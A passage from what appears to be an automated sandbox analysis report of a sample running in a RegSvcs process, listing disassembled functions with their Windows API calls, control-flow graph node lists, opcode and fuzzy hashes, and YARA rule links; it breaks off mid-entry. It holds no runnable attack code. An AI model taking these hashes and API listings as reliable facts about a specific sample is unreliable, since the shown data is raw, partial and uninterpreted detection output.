                                                            Function 06B03520 Relevance: .5, Instructions: 545COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 27d56c864af441948611b66a587c5a01676b41a2c1ba502eb29f15ee65008de7
                                                            • Instruction ID: ee08b8fa9d3b7e4c1b6aa21e0326e539c8bdfdb1c40c16b445364c42ab3c743d
                                                            • Opcode Fuzzy Hash: 27d56c864af441948611b66a587c5a01676b41a2c1ba502eb29f15ee65008de7
                                                            • Instruction Fuzzy Hash: 68321D30E1075ACBDB14DFB5D8545ADB7B6FFC9300F5096AAD409AB264EB30AD85CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B07E40 Relevance: .5, Instructions: 474COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0983e4e219085010a3cd6cb5350aae21a1005a294c08db9054095d9bceaf04f
                                                            • Instruction ID: 0abb60dabfb4341964fe247b4c8cc3264cdbfd012d6f14bdf41be27bc84c8e71
                                                            • Opcode Fuzzy Hash: d0983e4e219085010a3cd6cb5350aae21a1005a294c08db9054095d9bceaf04f
                                                            • Instruction Fuzzy Hash: 1402A170B012169FEF54DB64E454AAEBBF6FF88300F148568E4169B394DB35ED41CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AE3202 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 06AE328E
                                                            • GetCurrentThread.KERNEL32 ref: 06AE32CB
                                                            • GetCurrentProcess.KERNEL32 ref: 06AE3308
                                                            • GetCurrentThreadId.KERNEL32 ref: 06AE3361
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: b0b60a9dbf7fd9f6d52244087c275cdd570bce2db5293ed741817e74d6766dc4
                                                            • Instruction ID: ae20cd1ebe47a9bd5106c2f4cd25ca307f2193320c485b5a8c298d64ac20bccf
                                                            • Opcode Fuzzy Hash: b0b60a9dbf7fd9f6d52244087c275cdd570bce2db5293ed741817e74d6766dc4
                                                            • Instruction Fuzzy Hash: C25157B0900749CFEB94EFA9D848BDEBBF1EF88304F248059E119A7360D7346844CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AE3210 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 06AE328E
                                                            • GetCurrentThread.KERNEL32 ref: 06AE32CB
                                                            • GetCurrentProcess.KERNEL32 ref: 06AE3308
                                                            • GetCurrentThreadId.KERNEL32 ref: 06AE3361
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: f6e2998771a903106e61d1643a562e792dbaf9bbb52497af2f1a8303266d5656
                                                            • Instruction ID: e92dcec122afe02d2c41f8cf77e2446de7e13fbd55828e9ba2dc1f4f6ec8a07b
                                                            • Opcode Fuzzy Hash: f6e2998771a903106e61d1643a562e792dbaf9bbb52497af2f1a8303266d5656
                                                            • Instruction Fuzzy Hash: BE5137B0900749CFDB94EFA9D948B9EBBF1EF88304F248459E119A7350D7346944CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AEB708 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 749 6aeb708-6aeb727 751 6aeb729-6aeb736 call 6aea68c 749->751 752 6aeb753-6aeb757 749->752 757 6aeb74c 751->757 758 6aeb738 751->758 754 6aeb76b-6aeb7ac 752->754 755 6aeb759-6aeb763 752->755 761 6aeb7ae-6aeb7b6 754->761 762 6aeb7b9-6aeb7c7 754->762 755->754 757->752 808 6aeb73e call 6aeb9a2 758->808 809 6aeb73e call 6aeb9b0 758->809 761->762 763 6aeb7eb-6aeb7ed 762->763 764 6aeb7c9-6aeb7ce 762->764 769 6aeb7f0-6aeb7f7 763->769 766 6aeb7d9 764->766 767 6aeb7d0-6aeb7d7 call 6aea698 764->767 765 6aeb744-6aeb746 765->757 768 6aeb888-6aeb948 765->768 771 6aeb7db-6aeb7e9 766->771 767->771 801 6aeb94a-6aeb94d 768->801 802 6aeb950-6aeb97b GetModuleHandleW 768->802 772 6aeb7f9-6aeb801 769->772 773 6aeb804-6aeb80b 769->773 771->769 772->773 775 6aeb80d-6aeb815 773->775 776 6aeb818-6aeb821 call 6ae3d58 773->776 775->776 781 6aeb82e-6aeb833 776->781 782 6aeb823-6aeb82b 776->782 783 6aeb835-6aeb83c 781->783 784 6aeb851-6aeb855 781->784 782->781 783->784 786 6aeb83e-6aeb84e call 6aea508 call 6aea6a8 783->786 806 6aeb858 call 6aebc60 784->806 807 6aeb858 call 6aebc70 784->807 786->784 789 6aeb85b-6aeb85e 791 6aeb860-6aeb87e 789->791 792 6aeb881-6aeb887 789->792 791->792 801->802 803 6aeb97d-6aeb983 802->803 804 6aeb984-6aeb998 802->804 803->804 806->789 807->789 808->765 809->765
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06AEB96E
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 2133d41c3184fe1cf121ff08e4144b7e5bfb727814b86f1392392870c93366e3
                                                            • Instruction ID: 1a2a317c7b6c2b99f8eba2611acb19f99def38b92f594fa6a17b49ab6345ca32
                                                            • Opcode Fuzzy Hash: 2133d41c3184fe1cf121ff08e4144b7e5bfb727814b86f1392392870c93366e3
                                                            • Instruction Fuzzy Hash: AC813570A01B058FD7A4EF2AD55875ABBF1FF89300F008A2DD49ADBA50D774E845CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AED8E4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 810 6aed8e4-6aed956 812 6aed958-6aed95e 810->812 813 6aed961-6aed968 810->813 812->813 814 6aed96a-6aed970 813->814 815 6aed973-6aed9ab 813->815 814->815 816 6aed9b3-6aeda12 CreateWindowExW 815->816 817 6aeda1b-6aeda53 816->817 818 6aeda14-6aeda1a 816->818 822 6aeda55-6aeda58 817->822 823 6aeda60 817->823 818->817 822->823 824 6aeda61 823->824 824->824
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AEDA02
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 62c2b6c582d36f1cf06558bb3a0c65149b7448fe9465301584bc8caa524d9da4
                                                            • Instruction ID: cde55ff28a6d3da7bad58b493cc2cf9d1f3fb1342722fc0b065ee40c9e000c27
                                                            • Opcode Fuzzy Hash: 62c2b6c582d36f1cf06558bb3a0c65149b7448fe9465301584bc8caa524d9da4
                                                            • Instruction Fuzzy Hash: 4B51D1B1D00349EFDB14DF99C884ADEBFB5BF48310F24812AE819AB210D7749985CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AED8F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 825 6aed8f0-6aed956 826 6aed958-6aed95e 825->826 827 6aed961-6aed968 825->827 826->827 828 6aed96a-6aed970 827->828 829 6aed973-6aeda12 CreateWindowExW 827->829 828->829 831 6aeda1b-6aeda53 829->831 832 6aeda14-6aeda1a 829->832 836 6aeda55-6aeda58 831->836 837 6aeda60 831->837 832->831 836->837 838 6aeda61 837->838 838->838
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AEDA02
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: fc340fa36e3e304842ab110b3ae47237de5571cb0d82137f33d1880d2d3f2e31
                                                            • Instruction ID: 71947e685e1734a8fd55ad2624905a41c55ad1ee71b88ee8eecdd1ea602da5d3
                                                            • Opcode Fuzzy Hash: fc340fa36e3e304842ab110b3ae47237de5571cb0d82137f33d1880d2d3f2e31
                                                            • Instruction Fuzzy Hash: 4B41B0B1D00349DFDB14DF99C894ADEBBB5BF48710F24812AE819AB210D775A985CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0163FD70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 839 163fd70-163fdac 840 163fdb2-163fdb7 839->840 841 163fe5c-163fe7c 839->841 842 163fe0a-163fe42 CallWindowProcW 840->842 843 163fdb9-163fdf0 840->843 848 163fe7f-163fe8c 841->848 844 163fe44-163fe4a 842->844 845 163fe4b-163fe5a 842->845 849 163fdf2-163fdf8 843->849 850 163fdf9-163fe08 843->850 844->845 845->848 849->850 850->848
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0163FE31
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305995710.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_1630000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 32131ff7bde0e93880334fa86050aefc3748370aee906b9c04ebe31715fbb805
                                                            • Instruction ID: f943096ce5903ff83424997c9819ed8bac4007b9d62ddf510a7fd71bed972745
                                                            • Opcode Fuzzy Hash: 32131ff7bde0e93880334fa86050aefc3748370aee906b9c04ebe31715fbb805
                                                            • Instruction Fuzzy Hash: 4E4138B5900309DFDB14CF99C848AAABBF5FF88714F24C499D519AB321D374A845CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0163EE9C Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 853 163ee9c-163eeb9 856 163eebb-163eebe 853->856 857 163eebf-163ef4c GlobalMemoryStatusEx 853->857 860 163ef55-163ef7d 857->860 861 163ef4e-163ef54 857->861 861->860
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 0163EF3F
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305995710.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_1630000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 160f21db27ff725c85d6036c0357c77ac3728772b9c18563f07f1a5410d7829c
                                                            • Instruction ID: 274ae88fefd2e6ebf7441bd5fb32bef640c910f9a75c42be7f5d6597b5eb221c
                                                            • Opcode Fuzzy Hash: 160f21db27ff725c85d6036c0357c77ac3728772b9c18563f07f1a5410d7829c
                                                            • Instruction Fuzzy Hash: 99218671C0465ADFDB10DFA9D8047EEBBF5AF88310F15856AE908A7341D3789845CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AE3450 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 864 6ae3450-6ae3457 865 6ae3458-6ae34ec DuplicateHandle 864->865 866 6ae34ee-6ae34f4 865->866 867 6ae34f5-6ae3512 865->867 866->867
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06AE34DF
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 219573b63633de3c6560bd2cd7dbead2aad68e9e310381dd461beaddfd3f5bbf
                                                            • Instruction ID: 75eff01fca2c5ec095e108d00856b84bd93e7bc5223ff308044bcf13b354f64e
                                                            • Opcode Fuzzy Hash: 219573b63633de3c6560bd2cd7dbead2aad68e9e310381dd461beaddfd3f5bbf
                                                            • Instruction Fuzzy Hash: 222103B5C00248EFDB10CFAAD884ADEBBF8FB48310F14801AE914A7310D379A940CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AE3458 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 870 6ae3458-6ae34ec DuplicateHandle 871 6ae34ee-6ae34f4 870->871 872 6ae34f5-6ae3512 870->872 871->872
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06AE34DF
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 06872dd7c209c3e1efd60a44eb9e061cca940f78f4c2d5e7f3a0be3ced1e44e6
                                                            • Instruction ID: 7322de9c114829cd62f601ce8a31db942756d4f076de52eb3c86311cb8867fa2
                                                            • Opcode Fuzzy Hash: 06872dd7c209c3e1efd60a44eb9e061cca940f78f4c2d5e7f3a0be3ced1e44e6
                                                            • Instruction Fuzzy Hash: F921E4B5900249DFDB10CFAAD884ADEBBF8FB48310F14801AE914A7310D379A944CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01638071 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 875 1638071-16380c2 877 16380c4-16380c7 875->877 878 16380ca-16380f5 DeleteFileW 875->878 877->878 879 16380f7-16380fd 878->879 880 16380fe-1638126 878->880 879->880
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(00000000), ref: 016380E8
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305995710.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_1630000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: e594c547a0904136d1e773c1c49eeb38c2c804f57a1d5d6890524b9998896d6c
                                                            • Instruction ID: 3ad0ccd5a4d4f58bb511cb868e680c53dc5ba7092715ebfdedcb4b75829d82d4
                                                            • Opcode Fuzzy Hash: e594c547a0904136d1e773c1c49eeb38c2c804f57a1d5d6890524b9998896d6c
                                                            • Instruction Fuzzy Hash: 882123B1C0065A9BDB10CFAAC8457EEFBF4AF88710F148229D818A7240D738A941CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01638078 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 883 1638078-16380c2 885 16380c4-16380c7 883->885 886 16380ca-16380f5 DeleteFileW 883->886 885->886 887 16380f7-16380fd 886->887 888 16380fe-1638126 886->888 887->888
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(00000000), ref: 016380E8
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305995710.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_1630000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: d208ce967f06e38e56e8aab48c99f0588da2971ee8457f22702af703e830ac8a
                                                            • Instruction ID: a5d5a681fb35d8324821da8a358e67996f822e8f0e111ceaaadc138f9aef4dea
                                                            • Opcode Fuzzy Hash: d208ce967f06e38e56e8aab48c99f0588da2971ee8457f22702af703e830ac8a
                                                            • Instruction Fuzzy Hash: FE1113B1C0065A9BDB14CF9AC84469EFBB4EB48620F11822AD918A7240D738A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AEA6D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 891 6aea6d0-6aebbb0 893 6aebbb8-6aebbe7 LoadLibraryExW 891->893 894 6aebbb2-6aebbb5 891->894 895 6aebbe9-6aebbef 893->895 896 6aebbf0-6aebc0d 893->896 894->893 895->896
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06AEB9E9,00000800,00000000,00000000), ref: 06AEBBDA
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 797f764b4c542b5844b0bdeb6e322a515dc9f6b08057419e3d3463d00d73661c
                                                            • Instruction ID: aeba27117f767543e6ba669f846b99b623f592c0d11da64f02ea8a0b432763b2
                                                            • Opcode Fuzzy Hash: 797f764b4c542b5844b0bdeb6e322a515dc9f6b08057419e3d3463d00d73661c
                                                            • Instruction Fuzzy Hash: 6211E4B6D00349DFDB10DF9AC988A9EFBF4EB48710F10846AD519A7201C379A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AEBB6A Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 899 6aebb6a-6aebbb0 901 6aebbb8-6aebbe7 LoadLibraryExW 899->901 902 6aebbb2-6aebbb5 899->902 903 6aebbe9-6aebbef 901->903 904 6aebbf0-6aebc0d 901->904 902->901 903->904
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06AEB9E9,00000800,00000000,00000000), ref: 06AEBBDA
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 64c54af853db8753568696aa3898e5bd84dfe2ab867950cbfbe4a3f79ea0868b
                                                            • Instruction ID: d6dd29983943027a0254ec6b546ed196e76289f6263462e73250fcd786a95ba3
                                                            • Opcode Fuzzy Hash: 64c54af853db8753568696aa3898e5bd84dfe2ab867950cbfbe4a3f79ea0868b
                                                            • Instruction Fuzzy Hash: E311F6B6C00349DFDB10DF9AD984ADEFBF4EB88710F14841AD519A7200C379A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0163EED8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 907 163eed8-163ef4c GlobalMemoryStatusEx 909 163ef55-163ef7d 907->909 910 163ef4e-163ef54 907->910 910->909
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 0163EF3F
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3305995710.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_1630000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: c1e5e3040f194153ca018dc352bcb4754d53181ba07634485af5dd1074dfa128
                                                            • Instruction ID: d33c5fd427331c7e7ff949bc4600193964776df40422debbfcc3c914a1c8f2d0
                                                            • Opcode Fuzzy Hash: c1e5e3040f194153ca018dc352bcb4754d53181ba07634485af5dd1074dfa128
                                                            • Instruction Fuzzy Hash: 981112B1C006599BDB10CF9AC844B9EFBF4AF48720F15816AD918A7240D378A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06AEB908 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06AEB96E
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314136263.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6ae0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 0e58737c84279f88afe952ee48cf2f6f4e8c8d692b3560c0590a6d4483f353fc
                                                            • Instruction ID: 8ba5d733f7813c040503a5f7f13dd77111ff3559ef2413bfa85b93d67f49e365
                                                            • Opcode Fuzzy Hash: 0e58737c84279f88afe952ee48cf2f6f4e8c8d692b3560c0590a6d4483f353fc
                                                            • Instruction Fuzzy Hash: A011E0B5C00749CFDB10DF9AC544ADEFBF4EF88614F10851AD469A7210C379A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06F21630 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 06F2251D
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314651314.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6f20000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 3b48b6c6ab714efc83796df5b6f27aa332903c827886c3f3e55a8b68367b6889
                                                            • Instruction ID: 65416358b126514c36f609e9a55203c3b32ffe3b9ac592f58980edbbb295ab3c
                                                            • Opcode Fuzzy Hash: 3b48b6c6ab714efc83796df5b6f27aa332903c827886c3f3e55a8b68367b6889
                                                            • Instruction Fuzzy Hash: 2E1115B1800759CFDB50DF9ED449B9EBBF4EB48310F108459D519A7300C378AA44CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06F224C0 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 06F2251D
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314651314.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6f20000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 608dd8df8ee1212a435e99202303910a3d0a746d12888b6f708530edafbbc941
                                                            • Instruction ID: b24a6dedff89253bb5965d724c80b5cd7522fda068d0d60037f95c2dd9b9e6f2
                                                            • Opcode Fuzzy Hash: 608dd8df8ee1212a435e99202303910a3d0a746d12888b6f708530edafbbc941
                                                            • Instruction Fuzzy Hash: 601115B5C00349CFDB20DFAAD845BCEBBF4EB48720F108559D529A7240C379A644CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0CFF8 Relevance: .8, Instructions: 799COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a19eebc54319cec1945854b53574da2e7e087da3618e7500a5de7b2dd28a97cd
                                                            • Instruction ID: 9ae52383421b936180f78a5cf177694dc48ea58a5abbfd33be5a5665ed42a535
                                                            • Opcode Fuzzy Hash: a19eebc54319cec1945854b53574da2e7e087da3618e7500a5de7b2dd28a97cd
                                                            • Instruction Fuzzy Hash: AE621C70B0020ACFDB55DB78E594A9DBBB2FF85340F208A69D1059F295EB75EC46CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0B708 Relevance: .5, Instructions: 470COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 989c219843f8fc597442111288bd90c26f41409659b3e46140c6735cd8cab125
                                                            • Instruction ID: 79f3ab13c4247686996a8ae8f5d1b3c03b7ddb71adc719aac418cbe0a346cef0
                                                            • Opcode Fuzzy Hash: 989c219843f8fc597442111288bd90c26f41409659b3e46140c6735cd8cab125
                                                            • Instruction Fuzzy Hash: F6025F70E1020A8FEFA4DF68D4846ADBFB2FB45310F2095AAD415DB295DB36EC41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06B0AD88 Relevance: .4, Instructions: 392COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.3314298826.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_6b00000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb93acfdcd509b41839004f58bbd8d9b0a33ca0448816f3720809b7367222fb4
                                                            • Instruction ID: 4a567c203b74bea440fe4645f0de2130c4c6c2d0dd120b2eea222aaea635847d
